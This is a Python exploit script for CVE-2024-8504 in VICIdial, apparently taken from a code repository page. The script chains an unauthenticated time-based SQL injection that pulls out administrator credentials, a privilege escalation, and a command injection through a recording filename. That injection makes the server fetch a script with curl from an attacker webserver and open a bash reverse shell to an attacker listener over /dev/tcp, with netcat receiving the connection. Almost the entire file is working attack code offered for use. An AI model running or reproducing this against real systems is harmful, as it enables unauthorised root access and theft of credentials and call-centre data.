Files
CVE-2024-8504/exploit.py

889 lines
33 KiB
Python

import os
import re
import socket
import string
import random
import urllib3
import argparse
import requests
import threading
import rich_click as click
from faker import Faker
from base64 import b64encode
from datetime import datetime
from bs4 import BeautifulSoup
from urllib.parse import urlparse
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
class Exploit:
def __init__(
self, url, whost, wport, lhost=None, lport=None, bind=False, proxy=None
):
"""
This 'sleep' duration is derived by the average response time
multiplied by this value. A server with an average response time
of 10ms is given a 'sleep' duration of 300ms. Tune as needed.
"""
self.SLEEP_MULTIPLIER = 4
self.fake = Faker()
self.REQUEST_HEADERS = {"User-Agent": self.fake.user_agent()}
self.ALLOWED_SCHEMES = ["http", "https"]
if proxy:
self.REQUEST_PROXIES = {"http": proxy, "https": proxy}
else:
self.REQUEST_PROXIES = {}
self.TARGET_URL = url
# Resolve the domain to IP and replace in the URL
self.replace_domain_with_ip()
# Get the IP from the resolved URL
self.TARGET_IP = urlparse(self.TARGET_URL).hostname
self.PAYLOAD_WEBSERVER_HOST = whost
self.PAYLOAD_WEBSERVER_PORT = wport
self.REVERSE_SHELL_HOST = lhost
self.REVERSE_SHELL_PORT = lport
self.BIND = bind
self.VICIDIAL_FINGERPRINT = "Please Hold while I redirect you!"
self.RANDOM_CHARSET = string.ascii_uppercase + string.digits
self.CAMPAIGN_ID = "".join(random.choices(string.digits, k=6))
self.LIST_ID = str(int(self.CAMPAIGN_ID) + 1)
self.MALICIOUS_FILENAME = "." + "".join(
random.choices(string.ascii_lowercase + string.digits, k=4)
)
self.COMPANY_NAME = (
self.fake.company()
.replace(" ", "_")
.replace("-", "_")
.replace(",", "")
.lower()
)
def custom_print(self, message: str, header: str) -> None:
"""
Prints a message with a colored header to indicate the message type.
"""
header_colors = {
"+": "green",
"-": "red",
"!": "yellow",
"*": "blue",
"~": "magenta",
}
header_color = header_colors.get(header, "white")
formatted_message = click.style(
f"[{header}] ", fg=header_color, bold=True
) + click.style(f"{message}", bold=True, fg="white")
click.echo(formatted_message)
# returns a session object with custom proxies/headers if supplied
def build_requests_session(self):
session = requests.Session()
session.proxies = self.REQUEST_PROXIES
session.verify = False
return session
# returns a random string of a given length
def random(self, length):
return "".join(random.choice(self.RANDOM_CHARSET) for _ in range(length))
# returns a timedelta representing the response time of an injected SQL query
def time_sql_query(self, query, session):
username = f"goolicker', '', ({query}));# "
credentials = f"{username}:password"
credentials_base64 = b64encode(credentials.encode()).decode()
auth_header = f"Basic {credentials_base64}"
target_uri = f"{self.TARGET_URL}/VERM/VERM_AJAX_functions.php"
request_params = {
"function": "log_custom_report",
self.random(5): self.random(5),
}
request_headers = {**self.REQUEST_HEADERS, "Authorization": auth_header}
response = session.get(
target_uri, params=request_params, headers=request_headers
)
return response.elapsed
# returns a boolean if time-based SQL injection is possible, additionally
# sets the best 'sleep' duration based on response times
def is_vulnerable(self, session, baseline_iterations=5):
# determine average baseline response time
zero_sleep_query = f"SELECT (NULL)"
total_baseline_time = 0
for _ in range(baseline_iterations):
execution_time = self.time_sql_query(zero_sleep_query, session)
total_baseline_time += execution_time.total_seconds()
average_baseline_response_time = total_baseline_time / baseline_iterations
self.sql_baseline_time = average_baseline_response_time
# determine if injected sleep query impacts response time
sleep_length = round(average_baseline_response_time * self.SLEEP_MULTIPLIER, 2)
sleep_query = f"SELECT (sleep({sleep_length}))"
execution_time = self.time_sql_query(sleep_query, session)
if execution_time.total_seconds() >= sleep_length:
self.sql_sleep_length = sleep_length
return True
else:
return False
# determine if a character at a specific indice of a query result returns a
# boolean 'true' when compared to a given character using the supplied operator
def check_indice_of_query_result(self, session, query, indice, operator, ordinal):
parent_query = f"SELECT IF(ORD((SUBSTRING(({query}), {indice}, {indice}))){operator}{ordinal}, sleep({self.sql_sleep_length}), null)"
execution_time = self.time_sql_query(parent_query, session)
return execution_time.total_seconds() >= (
self.sql_baseline_time * self.SLEEP_MULTIPLIER
)
def enumerate_sql_query(
self, session, query="SELECT @@version", charset=string.printable
):
# convert charset to ordinals
all_characters = sorted([ord(char) for char in charset])
reduced_characters = all_characters
# use a binary search and enumerate query results
result = ""
indice = 1
indice_could_be_null = True
while True:
"""
we check if the value is NULL once per indice
to determine when a string ends. this adds one
request per indice, but since every boolean 'true'
results in a delay this is faster than counting
the length of the string before enumrating.
"""
if indice_could_be_null:
if self.check_indice_of_query_result(session, query, indice, "=", "0"):
break
else:
indice_could_be_null = False
# enumerate each character of query result with a binary search
middle_indice = len(reduced_characters) // 2
middle_ordinal = reduced_characters[middle_indice]
if self.check_indice_of_query_result(
session, query, indice, "<=", middle_ordinal
):
if self.check_indice_of_query_result(
session, query, indice, "=", middle_ordinal
):
reduced_characters = all_characters
result += chr(middle_ordinal)
indice += 1
indice_could_be_null = True
self.custom_print(result, "*")
else:
reduced_characters = reduced_characters[:middle_indice]
else:
reduced_characters = reduced_characters[middle_indice:]
return result
def get_dynamic_fields(self, session, username, password):
# Creates the POST request body to retrieve dynamic fields
vdc_db_query_body = {
"user": username,
"pass": password,
"ACTION": "LogiNCamPaigns",
"format": "html",
}
try:
# Sends the POST request to /agc/vdc_db_query.php
response = session.post(
f"{self.TARGET_URL}/agc/vdc_db_query.php", data=vdc_db_query_body
)
if not response or response.status_code != 200:
self.custom_print("Failed to retrieve hidden input fields", "-")
return None, None
# Parses the HTML response to retrieve the hidden input fields
soup = BeautifulSoup(response.text, "html.parser")
mgr_login_name = soup.find("input", {"name": re.compile(r"^MGR_login")})
mgr_pass_name = soup.find("input", {"name": re.compile(r"^MGR_pass")})
# Ensure both fields are retrieved
if not mgr_login_name or not mgr_pass_name:
self.custom_print(
"Could not find the required dynamic fields, constructing manually",
"!",
)
# Get today's date in the required format (YYYYMMDD)
today_date = datetime.now().strftime("%Y%m%d")
# Manually construct the dynamic field names
mgr_login_name = f"MGR_login{today_date}"
mgr_pass_name = f"MGR_pass{today_date}"
self.custom_print(
f"Manually constructed dynamic field names: {mgr_login_name}, {mgr_pass_name}",
"+",
)
else:
mgr_login_name = mgr_login_name["name"]
mgr_pass_name = mgr_pass_name["name"]
self.custom_print(
f"Retrieved dynamic field names: {mgr_login_name}, {mgr_pass_name}",
"+",
)
return mgr_login_name, mgr_pass_name
except Exception as e:
self.custom_print(f"An error occurred: {str(e)}", "-")
return None, None
def resolve_domain_to_ip(self, url):
"""Resolves a domain name to an IP address"""
try:
parsed_url = urlparse(url)
domain = parsed_url.hostname
if re.match(r"\d+\.\d+\.\d+\.\d+", domain):
return domain
ip_address = socket.gethostbyname(domain)
return ip_address
except socket.gaierror as e:
raise ValueError(f"Error resolving domain: {str(e)}")
def replace_domain_with_ip(self):
"""Replaces the domain in the TARGET_URL with its resolved IP address"""
ip_address = self.resolve_domain_to_ip(self.TARGET_URL)
self.TARGET_URL = self.TARGET_URL.replace(
urlparse(self.TARGET_URL).hostname, ip_address
)
def poison_recording_files(self, session, username, password):
try:
# authenticate using administrator credentials
credentials = f"{username}:{password}"
credentials_base64 = b64encode(credentials.encode()).decode()
auth_header = f"Basic {credentials_base64}"
target_uri = f"{self.TARGET_URL}/vicidial/admin.php"
request_params = {"ADD": "3", "user": username}
request_headers = {**self.REQUEST_HEADERS, "Authorization": auth_header}
response = session.get(
target_uri, params=request_params, headers=request_headers
)
if response.status_code == 200:
self.custom_print(
f'Authenticated successfully as user "{username}"', "+"
)
else:
self.custom_print(
"Failed to authenticate with credentials. Maybe hashing is enabled?",
"-",
)
return False
# update user settings to increase privileges beyond default administrator
user_settings_body = {
"ADD": "4A",
"user": username,
"DB": "0",
"pass": password,
"force_change_password": "N",
"full_name": self.fake.name(),
"user_level": "9",
"user_group": "ADMIN",
"phone_login": self.fake.user_name(),
"phone_pass": self.fake.password(),
"active": "Y",
"user_new_lead_limit": "-1",
"agent_choose_ingroups": "1",
"agent_choose_blended": "1",
"scheduled_callbacks": "1",
"vicidial_recording": "1",
"vicidial_transfers": "1",
"selected_language": "default+English",
"agent_shift_enforcement_override": "ALL",
"agent_call_log_view_override": "Y",
"hide_call_log_info": "Y",
"lead_filter_id": "NONE",
"max_inbound_filter_min_sec": "-1",
"inbound_credits": "-1",
"wrapup_seconds_override": "-1",
"ready_max_logout": "-1",
"GRADE_AGENTDIRECT": "10",
"LIMIT_AGENTDIRECT": "-1",
"GRADE_AGENTDIRECT_CHAT": "10",
"LIMIT_AGENTDIRECT_CHAT": "-1",
"qc_user_level": "1",
"view_reports": "1",
"alter_agent_interface_options": "1",
"modify_users": "1",
"change_agent_campaign": "1",
"delete_users": "1",
"modify_usergroups": "1",
"delete_user_groups": "1",
"modify_lists": "1",
"delete_lists": "1",
"load_leads": "1",
"modify_leads": "1",
"download_lists": "1",
"export_reports": "1",
"delete_from_dnc": "1",
"modify_campaigns": "1",
"campaign_detail": "1",
"modify_dial_prefix": "1",
"delete_campaigns": "1",
"modify_ingroups": "1",
"delete_ingroups": "1",
"modify_inbound_dids": "1",
"delete_inbound_dids": "1",
"modify_custom_dialplans": "1",
"modify_remoteagents": "1",
"delete_remote_agents": "1",
"modify_scripts": "1",
"delete_scripts": "1",
"modify_filters": "1",
"delete_filters": "1",
"ast_admin_access": "1",
"ast_delete_phones": "1",
"modify_call_times": "1",
"delete_call_times": "1",
"modify_servers": "1",
"modify_shifts": "1",
"modify_phones": "1",
"modify_carriers": "1",
"modify_labels": "1",
"modify_colors": "1",
"modify_statuses": "1",
"modify_voicemail": "1",
"modify_audiostore": "1",
"modify_moh": "1",
"modify_tts": "1",
"modify_contacts": "1",
"callcard_admin": "1",
"add_timeclock_log": "1",
"modify_timeclock_log": "1",
"delete_timeclock_log": "1",
"manager_shift_enforcement_override": "1",
"pause_code_approval": "1",
"vdc_agent_api_access": "1",
"api_allowed_functions%5B%5D": "ALL_FUNCTIONS",
"modify_same_user_level": "1",
"download_invalid_files": "1",
"alter_admin_interface_options": "1",
"SUBMIT": "SUBMIT",
}
response = session.post(
target_uri, headers=request_headers, data=user_settings_body
)
self.custom_print("Updated user settings to increase privileges", "+")
# update system settings without clobbering existing configuration
response = session.get(
target_uri, headers=request_headers, params={"ADD": "311111111111111"}
)
soup = BeautifulSoup(response.text, "html.parser")
form_tag = soup.find("form")
system_settings_body = {}
for input_tag in form_tag.find_all("input"):
setting_name = input_tag["name"]
setting_value = input_tag["value"]
system_settings_body[setting_name] = setting_value
for select_tag in form_tag.find_all("select"):
setting_name = select_tag["name"]
selected_tag = select_tag.find("option", selected=True)
if not selected_tag:
continue
setting_value = selected_tag.text
system_settings_body[setting_name] = setting_value
system_settings_body["outbound_autodial_active"] = "0"
response = session.post(
target_uri, headers=request_headers, data=system_settings_body
)
self.custom_print("Updated system settings", "+")
# create dummy campaign
campaign_settings_body = {
"ADD": "21",
"campaign_id": self.CAMPAIGN_ID,
"campaign_name": f"{self.COMPANY_NAME}_campaign",
"user_group": "---ALL---",
"active": "Y",
"allow_closers": "Y",
"hopper_level": "1",
"next_agent_call": "random",
"local_call_time": "12am-11pm",
"get_call_launch": "NONE",
"SUBMIT": "SUBMIT",
}
response = session.post(
target_uri, headers=request_headers, data=campaign_settings_body
)
self.custom_print(
f'Created dummy campaign "{self.COMPANY_NAME}_campaign"', "+"
)
# update dummy campaign
update_campaign_body = {
"ADD": "41",
"campaign_id": self.CAMPAIGN_ID,
"old_campaign_allow_inbound": "Y",
"campaign_name": f"{self.COMPANY_NAME}_campaign",
"active": "Y",
"lead_order": "DOWN",
"lead_filter_id": "NONE",
"no_hopper_leads_logins": "Y",
"hopper_level": "1",
"reset_hopper": "N",
"dial_method": "RATIO",
"auto_dial_level": "1",
"SUBMIT": "SUBMIT",
"form_end": "END",
}
response = session.post(
target_uri, headers=request_headers, data=update_campaign_body
)
self.custom_print("Updated dummy campaign settings", "+")
# create dummy list
list_settings_body = {
"ADD": "211",
"list_id": self.LIST_ID,
"list_name": f"{self.COMPANY_NAME}_list",
"campaign_id": self.CAMPAIGN_ID,
"active": "Y",
"SUBMIT": "SUBMIT",
}
response = session.post(
target_uri, headers=request_headers, data=list_settings_body
)
self.custom_print("Created dummy list for campaign", "+")
# fetch credentials for a phone login
try:
response = session.get(
target_uri, headers=request_headers, params={"ADD": "10000000000"}
)
phone_uri_path = BeautifulSoup(response.text, "html.parser").find(
"a", string="MODIFY"
)["href"]
response = session.get(
f"{self.TARGET_URL}{phone_uri_path}", headers=request_headers
)
soup = BeautifulSoup(response.text, "html.parser")
phone_extension = soup.find("input", {"name": "extension"})["value"]
phone_password = soup.find("input", {"name": "pass"})["value"]
recording_extension = soup.find("input", {"name": "recording_exten"})[
"value"
]
self.custom_print(
f"Found phone credentials: {phone_extension}:{phone_password}", "+"
)
except Exception as e:
self.custom_print(f"Error retrieving phone credentials: {str(e)}", "-")
return False
# authenticate to agent portal with phone credentials
mgr_login_name, mgr_pass_name = self.get_dynamic_fields(
session, username, password
)
if not all([mgr_login_name, mgr_pass_name]):
return False
# authenticate to agent portal with phone credentials
manager_login_body = {
"DB": "0",
"JS_browser_height": "1313",
"JS_browser_width": "2560",
"phone_login": phone_extension,
"phone_pass": phone_password,
"VD_login": username,
"VD_pass": password,
"MGR_override": "1",
"relogin": "YES",
"VD_login": username,
"VD_pass": password,
mgr_login_name: username,
mgr_pass_name: password,
"SUBMIT": "SUBMIT",
}
response = session.post(
f"{self.TARGET_URL}/agc/vicidial.php",
headers=request_headers,
data=manager_login_body,
)
self.custom_print(
f'Entered "manager" credentials to override shift enforcement', "+"
)
agent_login_body = {
"DB": "0",
"JS_browser_height": "1313",
"JS_browser_width": "2560",
"phone_login": phone_extension,
"phone_pass": phone_password,
"VD_login": username,
"VD_pass": password,
"VD_campaign": self.CAMPAIGN_ID,
}
response = session.post(
f"{self.TARGET_URL}/agc/vicidial.php",
headers=request_headers,
data=agent_login_body,
)
self.custom_print(f"Authenticated as agent using phone credentials", "+")
try:
malicious_filename = f"{self.CAMPAIGN_ID}1337$(curl$IFS@{self.PAYLOAD_WEBSERVER_HOST}:{self.PAYLOAD_WEBSERVER_PORT}$IFS-o$IFS{self.MALICIOUS_FILENAME}&&bash$IFS{self.MALICIOUS_FILENAME})"
session_name = re.findall(
r"var session_name = '([a-zA-Z0-9_]+?)';", response.text
)[0]
session_id = re.findall(
r"var session_id = '([0-9]+?)';", response.text
)[0]
self.custom_print(
f"Session Name: {session_name}, Session ID: {session_id}", "+"
)
except Exception as e:
self.custom_print(
f"Error retrieving session_name or session_id: {str(e)}", "-"
)
return False
record1_body = {
"server_ip": self.TARGET_IP,
"session_name": session_name,
"user": username,
"pass": password,
"ACTION": "MonitorConf",
"format": "text",
"channel": f"Local/{recording_extension}@default",
"filename": malicious_filename,
"exten": recording_extension,
"ext_context": "default",
"ext_priority": "1",
"FROMvdc": "YES",
}
try:
response = session.post(
f"{self.TARGET_URL}/agc/manager_send.php",
headers=request_headers,
data=record1_body,
)
recording_id_match = re.findall(
r"RecorDing_ID: ([0-9]+)", response.text
)
if not recording_id_match:
raise ValueError(
"Failed to retrieve RecorDing_ID from the response."
)
recording_id = recording_id_match[0]
self.custom_print(
f"Recording ID: {recording_id} retrieved successfully", "+"
)
self.custom_print(response.text, "~")
except Exception as e:
self.custom_print(f"Error retrieving RecorDing_ID: {str(e)}", "-")
return False
# stop malicious recording to prevent file size from growing
record2_body = {
"server_ip": self.TARGET_IP,
"session_name": session_name,
"user": username,
"pass": password,
"ACTION": "StopMonitorConf",
"format": "text",
"channel": f"Local/{recording_extension}@default",
"filename": f"ID:{recording_id}",
"exten": session_id,
"ext_context": "default",
"ext_priority": "1",
"FROMvdc": "YES",
}
response = session.post(
f"{self.TARGET_URL}/agc/conf_exten_check.php",
headers=request_headers,
data=record2_body,
)
return True
except Exception as e:
self.custom_print(f"An error occurred during exploitation: {str(e)}", "-")
finally:
# Always delete the campaign, regardless of success or failure
self.custom_print(
f"Deleting campaign '{self.COMPANY_NAME}_campaign' with ID {self.CAMPAIGN_ID}",
"*",
)
try:
session.get(
f"{self.TARGET_URL}/vicidial/admin.php?ADD=61&campaign_id={self.CAMPAIGN_ID}&CoNfIrM=YES",
headers=request_headers,
)
self.custom_print("Campaign deleted successfully.", "+")
except Exception as delete_exception:
self.custom_print(
f"Failed to delete campaign: {str(delete_exception)}", "-"
)
# returns administrator username and password by
# exploiting time-based SQL injection.
def extract_admin_credentials(self, session):
self.custom_print("Enumerating administrator credentials", "*")
username_charset = string.ascii_letters + string.digits
admin_username_query = "SELECT user FROM vicidial_users WHERE user_level = 9 AND modify_same_user_level = '1' LIMIT 1"
admin_username = self.enumerate_sql_query(
session, admin_username_query, username_charset
)
self.custom_print(f"Username: {admin_username}", "+")
password_charset = string.ascii_letters + string.digits + "-.+/=_"
admin_password_query = (
f"SELECT pass FROM vicidial_users WHERE user = '{admin_username}' LIMIT 1"
)
admin_password = self.enumerate_sql_query(
session, admin_password_query, password_charset
)
self.custom_print(f"Password: {admin_password}", "+")
return admin_username, admin_password
# emulates a webserver to deliver exploit script
# Webserver function that closes once contacted
def payload_webserver(self):
try:
server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
server.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
server.bind((self.PAYLOAD_WEBSERVER_HOST, int(self.PAYLOAD_WEBSERVER_PORT)))
server.listen(1)
self.custom_print(
f"Webserver started at {self.PAYLOAD_WEBSERVER_HOST}:{self.PAYLOAD_WEBSERVER_PORT}",
"*",
)
client, incoming_address = server.accept()
message = client.recv(100)
if b"User-Agent: curl" in message:
self.custom_print(
f"Received cURL request from {incoming_address[0]}", "+"
)
exploit_script = f"#!/bin/bash\n"
exploit_script += f"rm {self.MALICIOUS_FILENAME} /var/spool/asterisk/monitor/*{self.MALICIOUS_FILENAME}*\n"
exploit_script += f"bash -i >& /dev/tcp/{self.REVERSE_SHELL_HOST}/{self.REVERSE_SHELL_PORT} 0>&1\n"
http_response = f"HTTP/1.1 200 OK\r\n"
http_response += f"Content-Length: {len(exploit_script)}\r\n\r\n"
http_response += exploit_script
client.sendall(http_response.encode())
client.close()
server.close()
except Exception as e:
self.custom_print(f"Error in webserver: {str(e)}", "-")
def start_listener(self):
try:
self.custom_print(
f"Starting Netcat listener on port {self.REVERSE_SHELL_PORT}", "*"
)
os.system(f"nc -lvnp {self.REVERSE_SHELL_PORT}")
except Exception as e:
self.custom_print(f"Error while starting Netcat listener: {str(e)}", "-")
# Binds to provided addresses and handles incoming connections
def prepare_listeners(self):
try:
webserver = threading.Thread(target=self.payload_webserver)
listener = threading.Thread(target=self.start_listener)
self.custom_print("Listening for incoming connections...", "*")
webserver.start()
listener.start()
listener.join()
webserver.join()
except Exception as e:
self.custom_print(f"Error while setting up listeners: {str(e)}", "-")
def perform_sqli(self):
session = self.build_requests_session()
is_vulnerable = self.is_vulnerable(session)
if is_vulnerable:
self.custom_print(
"Target appears vulnerable to time-based SQL injection", "+"
)
else:
self.custom_print("Failed to perform time-based SQL injection", "-")
return None, None
username, password = self.extract_admin_credentials(session)
return username, password
def print_banner():
banner = """
=============================================
| EXPLOIT CVE-2024-8504 |
| Unauthenticated SQLi to RCE Exploit |
| Found by: KoreLogic |
| Modded by: Chocapikk |
=============================================
SQLi Command:
python exploit.py -u https://example.org
RCE Command (Authenticated):
python exploit.py -b -u https://example.org \\
-wh <webserver IP> -wp <webserver port> \\
-lh <your IP> -lp <your listener port> \\
-un <admin username> -pw <admin password>
=============================================
"""
click.echo(click.style(banner, fg="cyan", bold=True))
if __name__ == "__main__":
print_banner()
argparser = argparse.ArgumentParser(
description="Exploit for CVE-2024-8504: Unauthenticated SQLi to retrieve credentials or RCE as root"
)
required = argparser.add_argument_group("Required Arguments")
optional = argparser.add_argument_group("Optional Arguments")
required.add_argument(
"-u",
"--url",
required=True,
help="Vicidial Server URL (e.g., https://example.com:443)",
)
optional.add_argument(
"-wh", "--whost", required=False, help="Malicious webserver IP address"
)
optional.add_argument(
"-wp", "--wport", required=False, help="Malicious webserver port number"
)
optional.add_argument(
"-lh", "--lhost", required=False, help="Reverse shell listener IP address"
)
optional.add_argument(
"-lp", "--lport", required=False, help="Reverse shell listener port number"
)
optional.add_argument(
"-un",
"--username",
required=False,
help="Vicidial admin username if already known",
)
optional.add_argument(
"-pw",
"--password",
required=False,
help="Vicidial admin password if already known",
)
optional.add_argument(
"-b",
"--bind",
required=False,
help="Bind to [lhost:lport] and [whost:wport] and handle connections automatically",
action="store_true",
default=False,
)
optional.add_argument(
"-p",
"--proxy",
required=False,
help="HTTP[S] proxy to use for outbound requests",
default=None,
)
arguments = argparser.parse_args()
if arguments.bind and (not arguments.whost or not arguments.wport):
print("Error: --whost and --wport are required when using --bind.")
exit(1)
exploit = Exploit(
url=arguments.url,
whost=arguments.whost,
wport=arguments.wport,
lhost=arguments.lhost,
lport=arguments.lport,
bind=arguments.bind,
proxy=arguments.proxy,
)
session = exploit.build_requests_session()
if arguments.username and arguments.password:
exploit.custom_print("Using provided credentials for exploitation...", "*")
exploited = exploit.poison_recording_files(
session, arguments.username, arguments.password
)
if arguments.bind and exploited:
exploit.prepare_listeners()
else:
exploit.custom_print(
"Attempting SQLi exploitation to retrieve credentials...", "*"
)
username, password = exploit.perform_sqli()
if username and password:
exploit.custom_print(
f"SQLi successful: Username: {username}, Password: {password}", "+"
)
else:
exploit.custom_print("SQLi failed, no credentials retrieved.", "-")